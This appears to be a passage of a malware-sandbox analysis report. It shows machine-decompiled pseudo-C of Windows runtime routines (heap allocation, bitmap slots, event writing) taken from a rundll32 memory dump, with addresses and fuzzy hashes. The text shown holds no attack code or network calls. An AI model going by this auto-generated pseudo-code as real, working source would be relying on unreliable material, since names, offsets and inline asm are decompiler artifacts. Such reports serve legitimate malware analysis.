				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x46b0220);
				E0462D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x46c7b9c; // 0x0
				_t55 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0462D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x46c7b10 =  *0x46c7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x46c536c; // 0x29f0cc0
					if( *_t51 != 0x46c5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x46c5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x46c536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0460A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                            0x0460a61c
                                                                                            0x0460a61e
                                                                                            0x0460a623
                                                                                            0x0460a628
                                                                                            0x0460a62b
                                                                                            0x0460a62d
                                                                                            0x0460a648
                                                                                            0x0460a64a
                                                                                            0x0460a64f
                                                                                            0x04649b44
                                                                                            0x0460a6ec
                                                                                            0x0460a6f1
                                                                                            0x0460a6f1
                                                                                            0x0460a655
                                                                                            0x0460a657
                                                                                            0x0460a65a
                                                                                            0x0460a65d
                                                                                            0x0460a662
                                                                                            0x0460a663
                                                                                            0x0460a667
                                                                                            0x0460a668
                                                                                            0x0460a66d
                                                                                            0x0460a706
                                                                                            0x0460a706
                                                                                            0x04649bda
                                                                                            0x04649be6
                                                                                            0x04649beb
                                                                                            0x00000000
                                                                                            0x04649beb
                                                                                            0x0460a679
                                                                                            0x04649b7a
                                                                                            0x00000000
                                                                                            0x04649b7a
                                                                                            0x0460a683
                                                                                            0x0460a6f4
                                                                                            0x0460a6f7
                                                                                            0x0460a6f9
                                                                                            0x0460a6fd
                                                                                            0x0460a6a0
                                                                                            0x0460a6a0
                                                                                            0x0460a6ad
                                                                                            0x0460a6af
                                                                                            0x0460a6b4
                                                                                            0x04649ba7
                                                                                            0x04649bac
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04649bc6
                                                                                            0x04649bce
                                                                                            0x04649bd1
                                                                                            0x04649bd3
                                                                                            0x04649bd3
                                                                                            0x00000000
                                                                                            0x04649bd1
                                                                                            0x0460a6bd
                                                                                            0x0460a6c3
                                                                                            0x0460a6c6
                                                                                            0x0460a6d2
                                                                                            0x0460a701
                                                                                            0x0460a704
                                                                                            0x00000000
                                                                                            0x0460a704
                                                                                            0x0460a6d4
                                                                                            0x0460a6d6
                                                                                            0x0460a6d9
                                                                                            0x0460a6db
                                                                                            0x0460a6e1
                                                                                            0x0460a6e6
                                                                                            0x0460a6e8
                                                                                            0x0460a6e8
                                                                                            0x0460a6ea
                                                                                            0x00000000
                                                                                            0x0460a6ea
                                                                                            0x0460a688
                                                                                            0x0460a692
                                                                                            0x0460a694
                                                                                            0x0460a699
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460a69d
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9d0060fa0238c7b9fdc40e7eba49cb7795177fc87228bbcf78976c7fcb3b1769
                                                                                            • Instruction ID: 4ca70f645c89cc1988f18f8f29ed534146508b1c0ffac85ee213192dabd317dc
                                                                                            • Opcode Fuzzy Hash: 9d0060fa0238c7b9fdc40e7eba49cb7795177fc87228bbcf78976c7fcb3b1769
                                                                                            • Instruction Fuzzy Hash: 6F4149B5A50315DFDB18CFA8C880BAAB7B1FB99304F14C169E804AB380E775B901CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04657016 Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E04657016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x46cd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04656B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04656B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E045F7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04619AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0461B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L045F4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                            0x04657016
                                                                                            0x0465701e
                                                                                            0x0465702b
                                                                                            0x04657033
                                                                                            0x04657037
                                                                                            0x0465703c
                                                                                            0x0465703e
                                                                                            0x04657041
                                                                                            0x04657045
                                                                                            0x0465704a
                                                                                            0x04657050
                                                                                            0x04657055
                                                                                            0x0465705a
                                                                                            0x04657062
                                                                                            0x04657062
                                                                                            0x0465705a
                                                                                            0x04657064
                                                                                            0x04657064
                                                                                            0x04657067
                                                                                            0x04657071
                                                                                            0x04657096
                                                                                            0x0465709b
                                                                                            0x046570a2
                                                                                            0x046570a6
                                                                                            0x046570a7
                                                                                            0x046570ad
                                                                                            0x046570b3
                                                                                            0x046570b6
                                                                                            0x046570bb
                                                                                            0x046570c3
                                                                                            0x046570c3
                                                                                            0x046570c6
                                                                                            0x046570cd
                                                                                            0x046570dd
                                                                                            0x046570e0
                                                                                            0x046570e2
                                                                                            0x046570e2
                                                                                            0x046570ee
                                                                                            0x04657101
                                                                                            0x046570f0
                                                                                            0x046570f9
                                                                                            0x046570f9
                                                                                            0x0465710a
                                                                                            0x0465710e
                                                                                            0x04657112
                                                                                            0x04657117
                                                                                            0x04657118
                                                                                            0x04657118
                                                                                            0x046570bb
                                                                                            0x0465711d
                                                                                            0x04657123
                                                                                            0x04657131
                                                                                            0x04657131
                                                                                            0x04657136
                                                                                            0x0465713d
                                                                                            0x0465713e
                                                                                            0x0465713f
                                                                                            0x0465714a
                                                                                            0x0465714a
                                                                                            0x04657084
                                                                                            0x04657088
                                                                                            0x00000000
                                                                                            0x0465708e
                                                                                            0x0465708e
                                                                                            0x04657092
                                                                                            0x00000000
                                                                                            0x04657092

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d413512c86ced67032931a1f1650319621b70af0c8364e8b96a1572b6e53724
                                                                                            • Instruction ID: 7d656fd78dea60fafaee4bdeb572a52d2b02be54b108716a223b63a054768982
                                                                                            • Opcode Fuzzy Hash: 4d413512c86ced67032931a1f1650319621b70af0c8364e8b96a1572b6e53724
                                                                                            • Instruction Fuzzy Hash: 0C318F726047519BC320DF68C940A6AB7E9BF98701F044A29FD99877A0E730F914CBA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045FC182 Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 68%
                                                                                            			E045FC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E045F7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E046A8D34(_v8, _t80);
					}
					E045F2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E045EFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E046A8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E045EFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0461B180();
						if(_a4 != 0) {
							E045F2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E045FBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E045FBB2D(_t16, _t15);
						E045FB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E045EFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E045EFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E045EFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                            0x045fc18d
                                                                                            0x045fc18f
                                                                                            0x045fc191
                                                                                            0x045fc19b
                                                                                            0x045fc1a0
                                                                                            0x045fc1d4
                                                                                            0x045fc1de
                                                                                            0x04642d6e
                                                                                            0x045fc1e4
                                                                                            0x045fc1e4
                                                                                            0x045fc1e4
                                                                                            0x045fc1ec
                                                                                            0x04642d7d
                                                                                            0x04642d7d
                                                                                            0x045fc1f3
                                                                                            0x045fc1ff
                                                                                            0x04642d88
                                                                                            0x04642d8d
                                                                                            0x04642d94
                                                                                            0x04642d94
                                                                                            0x04642d9f
                                                                                            0x04642da4
                                                                                            0x04642dab
                                                                                            0x04642db0
                                                                                            0x04642db2
                                                                                            0x04642db3
                                                                                            0x04642db4
                                                                                            0x04642dbc
                                                                                            0x04642dc3
                                                                                            0x04642dc3
                                                                                            0x045fc205
                                                                                            0x045fc205
                                                                                            0x045fc208
                                                                                            0x045fc20e
                                                                                            0x045fc211
                                                                                            0x045fc216
                                                                                            0x045fc219
                                                                                            0x045fc21f
                                                                                            0x045fc222
                                                                                            0x045fc22c
                                                                                            0x045fc234
                                                                                            0x045fc23a
                                                                                            0x045fc23f
                                                                                            0x045fc245
                                                                                            0x045fc24b
                                                                                            0x045fc251
                                                                                            0x045fc25a
                                                                                            0x045fc276
                                                                                            0x045fc27d
                                                                                            0x045fc27d
                                                                                            0x045fc25c
                                                                                            0x045fc25c
                                                                                            0x00000000
                                                                                            0x045fc25e
                                                                                            0x045fc1a4
                                                                                            0x045fc1aa
                                                                                            0x045fc1b3
                                                                                            0x045fc265
                                                                                            0x045fc26c
                                                                                            0x045fc26c
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                            • Instruction ID: e71f32ce575aafc55258a80b3843a44b65691d1492bd37ac2f36c0866988d55d
                                                                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                            • Instruction Fuzzy Hash: 98312672B0154BBEEB05EBF4C880BE9F755BF82208F14416AD61847241EB357A15FBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460A70E Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 92%
                                                                                            			E0460A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x46c7b10; // 0x9
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x46c7b10 = 8;
					 *0x46c7b14 = 0x46c7b0c;
					 *0x46c7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0xa
					E0460A990(0x46c7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0460A840(__edx, __ecx, __ecx, _t52, 0x46c7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x46c7b10; // 0x9
					_t3 = _t37 + 0x27; // 0x30
					__eflags = _t3 >> 5 -  *0x46c7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x46c7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x30
						_v8 = _t4 >> 5;
						_t50 = L045F4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x46c7b18 = _v8;
						_t8 = _t52 + 7; // 0x10
						E0461F3E0(_t50,  *0x46c7b14, _t8 >> 3);
						_t28 =  *0x46c7b14; // 0x77e07b0c
						__eflags = _t28 - 0x46c7b0c;
						if(_t28 != 0x46c7b0c) {
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x11
						 *0x46c7b14 = _t50;
						_t48 = _v12;
						 *0x46c7b10 = _t9;
						goto L6;
					}
					 *0x46c7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                            0x0460a713
                                                                                            0x0460a714
                                                                                            0x0460a717
                                                                                            0x0460a71d
                                                                                            0x0460a720
                                                                                            0x0460a722
                                                                                            0x0460a727
                                                                                            0x0460a74a
                                                                                            0x0460a754
                                                                                            0x0460a75e
                                                                                            0x0460a768
                                                                                            0x0460a76a
                                                                                            0x0460a773
                                                                                            0x0460a78b
                                                                                            0x0460a790
                                                                                            0x0460a792
                                                                                            0x0460a741
                                                                                            0x0460a741
                                                                                            0x0460a743
                                                                                            0x0460a749
                                                                                            0x0460a749
                                                                                            0x0460a732
                                                                                            0x0460a73a
                                                                                            0x0460a797
                                                                                            0x0460a79d
                                                                                            0x0460a7a3
                                                                                            0x0460a7a9
                                                                                            0x0460a7b6
                                                                                            0x0460a7bc
                                                                                            0x0460a7ca
                                                                                            0x0460a7e0
                                                                                            0x0460a7e2
                                                                                            0x0460a7e4
                                                                                            0x04649bf2
                                                                                            0x00000000
                                                                                            0x04649bf2
                                                                                            0x0460a7ed
                                                                                            0x0460a7f2
                                                                                            0x0460a800
                                                                                            0x0460a805
                                                                                            0x0460a80d
                                                                                            0x0460a812
                                                                                            0x04649c08
                                                                                            0x04649c08
                                                                                            0x0460a818
                                                                                            0x0460a81b
                                                                                            0x0460a821
                                                                                            0x0460a824
                                                                                            0x00000000
                                                                                            0x0460a824
                                                                                            0x0460a7ae
                                                                                            0x00000000
                                                                                            0x0460a7ae
                                                                                            0x0460a73c
                                                                                            0x0460a73e
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c71cf9f7941e598b0a778936e170cef1e877343f203e49059a9a662c4457b37b
                                                                                            • Instruction ID: e90ca46fa5554b3e940ab3a161825bbe22cad968be618d561341c022aecf50e9
                                                                                            • Opcode Fuzzy Hash: c71cf9f7941e598b0a778936e170cef1e877343f203e49059a9a662c4457b37b
                                                                                            • Instruction Fuzzy Hash: 1F3187B5610202ABD715CF58D880F6ABBF9EBA4751F14895AE01587280F778FE01DF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046061A0 Relevance: .1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 97%
                                                                                            			E046061A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04605E50(0x45b67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E046A9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E045DF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                            0x046061b3
                                                                                            0x046061b5
                                                                                            0x046061bd
                                                                                            0x046061c3
                                                                                            0x046061c7
                                                                                            0x046061d2
                                                                                            0x046061ff
                                                                                            0x046061ff
                                                                                            0x04606201
                                                                                            0x04606207
                                                                                            0x04606207
                                                                                            0x046061d4
                                                                                            0x046061d9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046061df
                                                                                            0x046061e2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046061e6
                                                                                            0x046061e8
                                                                                            0x046061ee
                                                                                            0x046061ee
                                                                                            0x046061f9
                                                                                            0x0464762f
                                                                                            0x04647632
                                                                                            0x04647635
                                                                                            0x04647639
                                                                                            0x04647640
                                                                                            0x0464766e
                                                                                            0x04647675
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647681
                                                                                            0x04647689
                                                                                            0x0464768d
                                                                                            0x04647691
                                                                                            0x04647695
                                                                                            0x04647699
                                                                                            0x046476af
                                                                                            0x046476b5
                                                                                            0x046476b7
                                                                                            0x046476b7
                                                                                            0x046476d7
                                                                                            0x046476dc
                                                                                            0x00000000
                                                                                            0x046476dc
                                                                                            0x046476a2
                                                                                            0x046476a9
                                                                                            0x04647651
                                                                                            0x04647653
                                                                                            0x04647653
                                                                                            0x04647656
                                                                                            0x04647656
                                                                                            0x00000000
                                                                                            0x04647656
                                                                                            0x04647644
                                                                                            0x04647646
                                                                                            0x04647648
                                                                                            0x04647648
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5293d6360e236579d0b43e4db27e2457bbdab0b3efd587f183db83fff220bd00
                                                                                            • Instruction ID: 155119d9a7d6bc4ac54a2858d2caca693171c891962c456c94aed7951cc96f77
                                                                                            • Opcode Fuzzy Hash: 5293d6360e236579d0b43e4db27e2457bbdab0b3efd587f183db83fff220bd00
                                                                                            • Instruction Fuzzy Hash: 273169716057018FD764DF19C800B26B7E5FB98B00F05896DE8989B391E7B0E804CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DAA16 Relevance: .1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 95%
                                                                                            			E045DAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x46cd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x46c7b9c; // 0x0
					_t53 = L045F4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0461B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0461F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L045E6C59(_t53, _t51, _t58) != 0) {
							_t28 = E04605E50(0x45bc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0460B230(_v32, _v28, 0x45bc2d8, 1,  &_v24);
								_t28 = E045DF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                            0x045daa25
                                                                                            0x045daa29
                                                                                            0x045daa2d
                                                                                            0x045daa30
                                                                                            0x045daa37
                                                                                            0x045daa3c
                                                                                            0x04634458
                                                                                            0x04634458
                                                                                            0x04634472
                                                                                            0x04634474
